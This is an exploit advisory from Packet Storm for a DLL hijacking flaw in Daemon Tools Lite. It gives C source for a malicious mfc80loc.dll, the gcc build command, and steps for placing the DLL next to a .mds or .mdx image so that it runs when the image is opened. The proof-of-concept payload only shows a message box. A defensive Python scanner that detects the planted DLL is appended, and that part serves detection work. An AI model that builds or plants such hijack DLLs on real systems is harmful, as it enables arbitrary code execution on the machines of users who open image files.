Daemon Tools Lite 4.35.6.0091 mfc80loc.dll DLL Hijacking Exploit

2010-08-30T00:00:00
ID PACKETSTORM:93295
Type packetstorm
Reporter Christian Heinrich
Modified 2010-08-30T00:00:00

Description

                                        
`/*
  
Daemon Tools Lite <= 4.35.6.0091 mfc80loc.dll DLL Hijacking Exploit  
  
Found by: Christian Heinrich (cmlh)  
Exploit by: Christian Heinrich (cmlh)  
  
Email: christianheinrich@live.com  
Web: http://www.twitter.com/cmlh  
  
Summary: Daemon Tools is a disk image mounting application for Microsoft Windows.  
  
Description: Daemon Tools suffers from a DLL hijacking vulnerability
that enables an attacker to execute arbitrary code on a local
level through the .MDS and .MDX extensions.
  
----  
  
Howto:  
  
gcc -shared -o mfc80loc.dll daemontoolsexploit.c  
  
Compile this file and rename to mfc80loc.dll  
  
Then create an empty file named anything.mds or anything.mdx, or you can create
a legitimate image.
  
Double clicking the .mds/.mdx file with the mfc80loc.dll file in the same folder will execute  
our code.  
  
----  
  
Tested on Microsoft Windows 7 / XP sp 3  
  
Vulnerability discovered by Christian Heinrich (cmlh)  
  
  
christianheinrich@live.com  
  
27.08.2010  
  
*/  
  
  
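#include <windows.h>

/* Forward declaration: DllMain calls dll_mll() before its definition. */
int dll_mll(void);

/* Loader entry point; runs when the process maps this DLL. */
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        dll_mll();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }

    return TRUE;
}

/* Proof-of-concept payload: shows a message box to prove the DLL was loaded. */
int dll_mll(void)
{
    MessageBox(0, "Hacked by cmlh !", "DLL Message", MB_OK);
    return 0;
}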
`
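
A defender-side check for the condition described above, added here as an example and not part of the original advisory: it walks a directory tree and reports every folder where a file named mfc80loc.dll sits beside a .mds or .mdx image. The function names and the sample directory tree are constructed for illustration.

```python
import hashlib
import os
import tempfile

# From the advisory: the DLL name and the image extensions involved.
HIJACK_DLLS = {"mfc80loc.dll"}
IMAGE_EXTS = {".mds", ".mdx"}


def find_planted_dlls(root):
    """Report DLLs with a hijackable name that share a folder with a disc image."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        dlls = [f for f in files if f.lower() in HIJACK_DLLS]
        images = sorted(f for f in files
                        if os.path.splitext(f)[1].lower() in IMAGE_EXTS)
        if not dlls or not images:
            continue  # a lone DLL or a lone image is not the pattern
        for dll in dlls:
            path = os.path.join(dirpath, dll)
            try:
                with open(path, "rb") as fh:
                    digest = hashlib.sha256(fh.read()).hexdigest()
            except OSError:
                digest = None  # unreadable file is still worth reporting
            findings.append({"dll": path, "sha256": digest, "images": images})
    return findings


def demo():
    """Build a constructed directory tree and scan it."""
    with tempfile.TemporaryDirectory() as root:
        layout = {
            "downloads/share/MFC80LOC.DLL": b"constructed sample bytes",
            "downloads/share/movie.mds": b"",
            "images/clean.mdx": b"",                 # image alone
            "tools/mfc80loc.dll": b"no image here",  # DLL alone
        }
        for rel, data in layout.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(data)
        return [(os.path.relpath(f["dll"], root).replace(os.sep, "/"),
                 f["images"], f["sha256"]) for f in find_planted_dlls(root)]


if __name__ == "__main__":
    print(demo())
```

Matching is case-insensitive because Windows file names are; the SHA-256 is included so a hit can be compared against a known-good copy of the DLL during triage.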